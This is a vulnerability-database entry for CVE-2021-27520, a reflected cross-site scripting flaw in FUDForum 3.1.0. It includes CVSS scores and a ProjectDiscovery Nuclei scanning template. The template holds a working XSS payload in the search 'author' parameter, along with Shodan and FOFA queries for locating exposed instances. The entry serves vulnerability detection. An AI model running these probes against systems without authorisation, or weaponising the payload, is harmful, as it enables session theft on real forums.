Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-27520
HistoryMar 05, 2023 - 1:42 p.m.

FUDForum 3.1.0 - Cross-Site Scripting

2023-03-0513:42:10
ProjectDiscovery
github.com
4
cve2021
packetstorm
xss
fuddorum
edb
intrusive

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.0%

FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.
id: CVE-2021-27520

info:
  name: FUDForum 3.1.0 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    FUDForum 3.1.0 contains a cross-site scripting vulnerability. An attacker can inject JavaScript via index.php in the author parameter, thereby possibly stealing cookie-based authentication credentials and launching other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/49943
    - https://github.com/fudforum/FUDforum/issues/2
    - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-27520
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-27520
    cwe-id: CWE-79
    epss-score: 0.00217
    epss-percentile: 0.59671
    cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: fudforum
    product: fudforum
    shodan-query:
      - html:"FUDforum"
      - http.html:"fudforum"
      - 'http.html:"powered by: fudforum"'
    fofa-query:
      - 'body="powered by: fudforum"'
      - body="fudforum"
  tags: cve2021,cve,packetstorm,xss,fuddorum,edb,intrusive,fudforum

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D'
      - '{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x"+onmouseover%3Dalert%28document.domain%29+x%3D%22'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - onmouseover=alert(document.domain) x=
          - FUDforum
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210096193552bb1308ff4af0bd2cedbb19f81f6a2d167bd0c80e8c8e9e7c228540c702207e9846cc77f42a77a6ac87c88cca089a914b18bfb2b67c6e1f42f4f7c23db44b:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.003 Low

EPSS

Percentile

70.0%